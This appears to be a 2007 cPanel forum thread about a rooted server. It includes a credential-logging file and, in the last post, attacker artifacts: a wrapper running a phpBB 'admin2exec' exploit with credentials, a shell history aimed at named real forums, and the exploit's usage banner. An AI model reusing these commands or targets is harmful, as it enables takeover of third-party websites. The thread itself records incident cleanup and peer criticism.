The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Would this work on /.a

Discussion in 'General Discussion' started by viooltje, Jul 22, 2007.

  1. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    pico .bash_profile

    add this:
    perl -pi -w -e 's/\(searched.*?secretpass.*?patern.*?\)/\(replace something\)/g;' /.a
    perl -pi -w -e 's/^usernames/replaced username/g;' /.a
    perl -pi -w -e 's/your ip.*?your ip/new ip/g;' /.a


    would this work or not?
    After every login it should replace the /.a file that contains plain login text passwords.
    Or is this nonsense and don't improve any server security?


    An question:
    i have a file in /.a containing:
    login name@86.ip.160 (plain text password) [Wed Jul 11 2007 12:05:46 +0200]


    which file is wrinting to it and how to change the file?
     
  2. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    I'm not going to get deep into this thread but unless you still havent rebuilt that server you shouldnt see a file like that. Are you saying that file is in "/" or in "/root" ?

    If this is the same hacked server then I guess its pretty normal for you to find that file and others like it..... :rolleyes:
     
  3. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    I think I have rebuild the server everything is runing normal all security safe audit are in place.
    Only that file is left.
     
  4. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    Just out of curiosity, what did you do to "rebuild" the server ?. I mean just generals steps, you dont have to give exact details.
     
  5. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,474
    Likes Received:
    202
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    Why not? He's posted a "sticky" about the exact details on the hacked server.

    http://www.lordsoflords.com/forums/topic.php?tid=7602

    "I think I have cleaned the server, but not sure a special dude is looking at it, I hope he don't install more trojans."

    While the rest of the Web gets attacked from this server, he's posting stickies about what he's "learned so far"

    Time for an email to his ISP I think. This has gone on too long. Anyone from ev1servers reading this crap?


    lordsoflords.com (66.98.254.23)
     
  6. mtindor

    mtindor Well-Known Member

    Joined:
    Sep 14, 2004
    Messages:
    1,281
    Likes Received:
    37
    Trophy Points:
    48
    Location:
    inside a catfish
    cPanel Access Level:
    Root Administrator
    Agreed. This is assinine. It's apparent that no real attempt was made to wipe/reinstall. And anything less than that, for him, would be ineffective. Even the most security conscious and security-knowledgeable people often think twice about trying to clean up after a rootkit - For him to think that he is going to have a rooted box all secured is a longshot.

    Once I paid enough attention to the thread to see that there have been actual websites defaced by activities originating from his machine, that was enough to say that somebody needs to get it the hell off the net immediately.

    Mike
     
  7. viooltje

    viooltje Well-Known Member

    Joined:
    Mar 14, 2004
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    milw0rm.com

    you will find even more scary stuff to worry about.
    all servers are under constant attack!

    ____________________________________________________________

    a file called 'f' contains this:
    perl a -u http://$1 -L z3c3v3 -P fbiteam -i 2


    he calls for it:
    ./f smallville.andyweb.net/forum/
    #1184954876
    ./f smallville.andyweb.net/forum/
    #1184961835
    ./f www.ourtradingclub.com/forum/
    #1184961887
    ./f www.scribbly.net/forum/
    #1184961934
    ./f www.tmetz.net/forums/
    #1184962444
    ./f www.thegrumpystrumpet.com/brassrail/
    #1184962504
    ./f www.jcpbook.com/phpbbX/
    #1184962552
    ./f home.exetel.com.au/getinfo/connect/forum/
    #1184962632
    ./f www.youngrepublicanclub.net/bb/

    he's attacking and taking over old phpbb forums.
    and I had one runing too after I removed the PHPbb and now it seems to be fine again.


    print "\\=-----------------------------------=/\r\n";
    print "| phpBB admin2exec exploit by RST/GHC |\r\n";
    print "| version 2 (user_sig_bbcode_uid) |\r\n";
    print "/=-----------------------------------=\\\r\n";
    print "\r\n Usage: r57phpbba2e2.pl [OPTIONS]\r\n\r\n";
    print " Options:\r\n";
    print " -u - path to forum e.g. http://site/f... done allot of these things and googling.
     

Share This Page